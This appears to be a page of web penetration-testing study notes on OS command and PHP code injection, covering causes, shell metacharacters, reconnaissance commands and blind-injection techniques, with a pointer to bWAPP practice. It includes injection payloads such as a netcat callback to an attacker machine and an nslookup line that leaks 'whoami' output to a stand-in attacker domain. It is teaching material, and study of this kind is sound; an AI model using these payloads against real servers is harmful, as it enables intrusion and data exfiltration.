4.1 Command Injection

Command Injection

Command Injection vulnerabilties in the context of web app pt occur when an attacker can manipulate input fields of a web app in a way that allow them to execute OS commands on the underlying server.

This vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.

Main causes of this vulnerability are:

User Input Handling: web app often take user input through forms, query parameters, etc.
Lack of Input Sanitazion: insecurely coded app may fail to properly validate, sanitize or escape user inputs
Injection Points: attacker identify injection points such as input fileds or URL query parameters, where they can insert malicious commands

Exploitation

Attackers can exploit it crafting malicious input that includes special chars like ; | \ and other shell metachars to break out of the intended input context and inject their commands.
When the app processes the attacker's input, it constructs a shell command using the milicious input.
The server, believing the command to be legitimate, executes it in the underlyng OS.

Then, attackers can execute arbitrary commands with the privileges of the web server process, potentially leading to unauthorized data access and exfiltrate them, code execution or sistem compromise, manipulating the server, installing malware or create backdoors for future access.

PHP Code Injection

PHP Code Injection also know as PHP Code Execution vulnerability occur when an attacker can inject and execute arbitrary PHP code within a web app.

It's more similat to generic command injection but regards only PHP code. Of course, they allow attackers to gain authorized access to the server, execute malicious actions and potentially compromise web app.

Example

In an upload form we can upload a file and add at the end of URL this payload:

; id to display the id and information of user that runs on the machine

If the web app don't respond it can't be vulnerable or can have a command injection blind, than we can try to take us in listening mode with netcat: nc -nvlp 4444 and and use ;nc <attacker_machine> 4444 and see if we can reach out our attacker machine from web app.

Ways of injecting OS commands

&
&&
|
||
;
Newline (0x0a or \n)
`
injected command `
$(
injected command )

Useful commands

Purpose of command

Linux

Windows

Name of current user

whoami

Operating system

uname -a

ver

Network configuration

ifconfig

ipconfig /all

Network connections

netstat -an

Running processes

ps -ef

tasklist

Blind OS command injection vulnerabilities

#blind OS command injection using time delays
& ping -c 10 127.0.0.1 &

#blind OS command injection by redirecting output
& whoami > /var/www/static/whoami.txt &

#blind OS command injection using out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
wwwuser.kgji2ohoyw.web-attacker.com

Practise

There's a dedicated module on BWapp vulnerable web app.

PreviousInjection Vulnerabilities Next4.2 Cross-Site Scripting (XSS)